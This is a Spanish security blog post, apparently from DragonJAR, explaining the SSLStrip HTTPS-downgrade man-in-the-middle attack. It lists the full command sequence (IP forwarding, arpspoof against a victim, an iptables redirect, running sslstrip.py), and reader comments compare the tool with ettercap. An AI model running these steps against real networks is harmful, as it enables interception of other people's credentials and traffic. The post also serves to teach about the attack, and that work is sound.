SSLStrip – Espiando tráfico SSL


Desde que Moxie Moulinsart mostró su SSLStrip en Blackhat, el MODO PARANOICO de muchas personas quedó encendido y no es para menos, ya que con esta herramienta cualquier persona puede tu trafico sin problemas.

sslstrip SSLStrip   Espiando tráfico SSL

El funcionamiento de es simple, reemplaza todas las peticiones “https://” de una página web por “http://” y luego hacer un MITM entre el servidor y el cliente. La idea es que la víctima y el agresor se comuniquen a través de HTTP, mientras que el atacante y el servidor, se comunican a través de HTTPS con el certificado del servidor. Por lo tanto, el atacante es capaz de ver todo el tráfico en texto plano de la víctima.

A continuación les dejo vídeo, donde podemos apreciar en funcionamiento de esta excelente herramienta.

En resumen, los pasos serian:

1. Configurar IP Forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. Realizando ataque ARP MITM entre las 2 maquinas:

arpspoof -i eth0 -t VICTIMA HOST

3. Redireccionar trafico con iptables:

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

4. Iniciar SSLStrip en el puerto utilizado

python sslstrip.py -w archivo

Espero que les sea de utilidad y no olviden comentar icon wink SSLStrip   Espiando tráfico SSL

Mas Información:
Pagina Oficial del SSLStrip


Si te ha gustado el post, compartelo y ayudanos a crecer.

Unete a nuestra Fanpage Siguenos en Twitter

Autor: DragoN

Ingeniero en Sistemas y Telecomunicaciones de la Universidad de Manizales. Information Security Researcher con más de 10 años de experiencias en Ethical Hacking, Pen Testing y Análisis Forense. Docente Universitario en Pre y Post-Grado, Speaker y Organizador de diferentes eventos de Seguridad Informática, Co-Fundador del ACK Security Conference y Fundador de DragonJAR SAS y de La Comunidad DragonJAR, una de las comunidades de seguridad informática mas grandes de habla hispana y referente en el sector.

Compartir este Artículo
  • http://publicbytes.blogspot.com darkhunter

    Debemos recordar que ahora no es nisiquiera necesario hacer esto porque la herramienta ettercap ya tiene todo lo necesario para realizar el ataque de manera automatizada con lo que cualquier persona puede hacerlo y comprometer la seguridad de nuestra informacion. desde que conozco la tecnica no entro a ningun correo sin primero verificar que el certificado sea valido :) y por regla general busco tarjetas en modo promiscuo con el mismo ettercap y por ultimo siempre se debe verificar que sea realmente una conexion https ….. y no solo por la barra del navegador

  • http://hackhispano.com j8k6f4v9j

    Hace tiempo que no uso darkhunter, pero recuerdo que con ese programa preparaba un certificado falso. En este caso, con SSLStrip (que no he usado), el método es diferente, ya que el usuario no tiene que aceptar ningún certificado al tratarse de una comunicación no protegida con SSL la que se produce entre víctima y atacante.

    Salu2

  • http://hackhispano.com j8k6f4v9j

    s/darkhunter/ettercap, darkhunter/

  • http://www.bilbaodigital.es Carlos

    Ettercap automatiza el MiM pero genera una error de certificado en la víctima. SSLStrip aumenta las posibilidades de que se produzca un error de usuario ya que pasa de tener que aceptar un certificado inseguro a no fijarse en que la conexión es http.

  • Pingback: [SSLStrip] Espiando tráfico SSL

  • http://nuestrasfrikadas.blogspot.com DeMoN

    Con el ataque de ettercap el usuario tiene que aceptar una advertencia de certificado falso pero la conexion es realmente en https, con este metodo el usuario no tiene que aceptar nada, la conexion es en http pero es mas facil no fijarse en una s pequeña que aceptar un monton de advertencias…

  • solodebian

    Cierto, con sslstrip no tienes que aceptar una advertencia de certificado… pero creo que sslstrip ya se esta quedando obsoleto porque he estado haciendo pruebas con mis maquinas y no es tan efectivo como antes aparte que al entrar en una pagina como puede ser la pagina de login de gmail directamente sslstrip me tira unos errores me imagino que las paginas como hotmail gmail y similares ya se han puesto las pilas para bloquear esta herramienta que ha funcionado desde febrero del 2009 hasta febrero del 2011.

  • Pingback: FaceNiff o Firesheep para Android

  • Pingback: SSLScan, comprueba la seguridad de tu SSL | Hermetric